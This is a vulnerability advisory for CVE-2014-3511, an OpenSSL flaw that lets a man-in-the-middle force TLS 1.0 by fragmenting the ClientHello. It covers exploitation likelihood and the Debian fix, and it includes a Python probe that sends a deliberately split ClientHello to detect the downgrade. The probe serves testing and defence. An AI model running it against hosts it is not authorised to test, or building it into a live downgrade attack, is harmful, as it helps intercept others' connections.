CVE-2014-3511
EPSS 5.4%
Description
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 1.0.1 before 1.0.1i allows man-in-the-middle attackers to force the use of TLS 1.0 by triggering ClientHello message fragmentation in communication between a client and server that both support later TLS versions, related to a "protocol downgrade" issue.
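The mechanism behind that description: the pre-1.0.1i version of ssl23_get_client_hello decided the protocol version from the first TLS record alone, and when that record was too short to contain the ClientHello's client_version bytes it assumed TLS 1.0 rather than reading further or rejecting the record. An attacker in the path only has to re-split the client's first record. The following probe is an added example (not code from this page or from OpenSSL): it builds a minimal TLS 1.2 ClientHello, splits it so that the first record carries only 5 handshake bytes, and reports the version the server answers with. Function names, the fixed cipher-suite list, and the 5-byte split are this example's choices; the check works offline on constructed bytes, and `probe()` opens a real socket only when invoked.

```python
import socket
import struct

TLS10 = (3, 1)
TLS12 = (3, 3)


def build_client_hello(version=TLS12):
    """Build a minimal ClientHello handshake message (no extensions).

    Layout: msg_type(1) | length(3) | client_version(2) | random(32) |
            session_id_len(1) | cipher_suites_len(2) | cipher_suites |
            compression_methods_len(1) | compression_methods
    """
    client_random = bytes(32)  # fixed zeros: acceptable for a probe, never for real use
    # RSA key exchange, AES-CBC; 0x003c/0x003d are TLS 1.2-only suites (example choice)
    cipher_suites = b"\x00\x2f\x00\x35\x00\x3c\x00\x3d"
    body = (bytes(version) + client_random + b"\x00"
            + struct.pack("!H", len(cipher_suites)) + cipher_suites
            + b"\x01\x00")
    return b"\x01" + struct.pack("!I", len(body))[1:] + body


def tls_record(payload, record_version=TLS10):
    """Wrap payload in a handshake (content type 22) TLS record."""
    return b"\x16" + bytes(record_version) + struct.pack("!H", len(payload)) + payload


def fragment_client_hello(hello, first_len=5):
    """Return the ClientHello as one record (first_len None) or split across two.

    With first_len < 6 the client_version bytes (offsets 4-5 of the handshake
    message) are absent from the first record. The pre-fix ssl23_get_client_hello
    inspected only that record and, finding it shorter than 6 bytes, assumed
    TLS 1.0; 1.0.1i rejects such a record instead.
    """
    if first_len is None or first_len >= len(hello):
        return tls_record(hello)
    return tls_record(hello[:first_len]) + tls_record(hello[first_len:])


def parse_server_hello_version(data):
    """Return (major, minor) from a ServerHello at the start of a TLS byte stream.

    Returns None for anything else (alert, truncated read, closed connection),
    which is what a patched server produces for the short first record.
    """
    if len(data) < 11 or data[0] != 0x16 or data[5] != 0x02:
        return None
    return (data[9], data[10])


def is_downgraded(offered, negotiated):
    """True when the server chose a lower version than the client offered."""
    return negotiated is not None and tuple(negotiated) < tuple(offered)


def probe(host, port=443, first_len=5, timeout=5.0):
    """Send the (optionally fragmented) ClientHello; return (version, downgraded)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(fragment_client_hello(build_client_hello(TLS12), first_len))
        data = b""
        while len(data) < 11:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    negotiated = parse_server_hello_version(data)
    return negotiated, is_downgraded(TLS12, negotiated)


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    baseline, _ = probe(host, first_len=None)   # unfragmented: what the server normally picks
    fragmented, down = probe(host, first_len=5)
    print("unfragmented:", baseline, "fragmented:", fragmented, "downgraded:", down)
```

Read the result as a pair: a server that answers (3, 3) to the whole-record ClientHello but (3, 1) to the fragmented one exhibits the CVE-2014-3511 behaviour; a server that answers (3, 1) to both simply does not offer TLS 1.2, and a patched server closes the connection or sends an alert on the fragmented probe, which shows up as None. Run it only against hosts you are authorised to test.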
How to fix CVE-2014-3511
To remediate CVE-2014-3511, upgrade the affected package to the fixed version listed below. The upstream fix is OpenSSL 1.0.1i, which rejects a ClientHello whose first record is too short to carry the client version instead of assuming TLS 1.0. Only the server side (s23_srvr.c) is affected. After upgrading libssl, restart every service that links against it: a running process keeps the old library mapped until it is restarted.
- Debian/openssl: upgrade to 1.0.1i-1 or later
Is CVE-2014-3511 being exploited?
Moderate: EPSS is 5.4%, the estimated probability of exploitation activity in the next 30 days. This is a protocol downgrade to TLS 1.0 by an attacker already positioned in the network path, not remote code execution, so track it but do not put it at the top of the prioritisation list.
Affected packages (1)
- Debian/openssl: from 0, < 1.0.1i-1